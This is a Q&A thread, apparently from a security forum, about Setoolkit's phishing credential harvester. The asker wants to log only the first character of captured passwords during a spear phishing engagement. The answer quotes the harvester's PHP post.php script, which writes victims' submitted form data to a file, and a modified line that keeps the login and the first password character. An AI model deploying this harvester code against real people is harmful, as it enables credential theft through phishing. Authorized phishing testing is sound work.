# Setoolkit - credential harvester, only display the first character of the password

Tags: passwords, hash, metasploit, kali-linux

I'm launching a spear phishing campaign and my client has specifically asked me to only harvest the first character of the password, is there a way to do so?

Basically instead of showing the whole password when a user will input theirs, I want only the first character to appear.

Otherwise, is it possible to produce a hashing when the password is being sent to the apache server?

Comment: If you only want part of the captured password, you would have to write a script or something to dump the rest of the password. There is no reason for the tool to make this a feature. You need to explain what you mean by your hashing question.

Comment: What I mean by the hashing question, is when the password is written to post.php, I want it to appear hashed directly or encrypted.

Answer (score 1):

If you're using the option I'm thinking of, your cloned form is POSTing to post.php. You could edit that script in order to make it do what you want.

```
<?php
$file = 'harvester_sdfskksdks.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>

<meta http-equiv="refresh" content="0; url=http://0.0.0.0:8000/index.html" />
```

Instead of writing all the $_POST var, just do

```
file_puts_content($file, $_POST['login'] . ':' . substr($_POST['password'], 0, 1), FILE_APPEND)
```

Comment: Hi rgehan, thanks but it's not working, I also tried adding `print_r` but to no avail, I did correct the `file_put_contents`. Tried only putting 0 and 1 instead of 0, 1 but still not working. The only thing that happens is that "Date modified" changes but it actually doesn't write anything to the file.

Comment: It might be doing so because the password is empty. Substring would return an empty char or NULL I guess. Check the variables name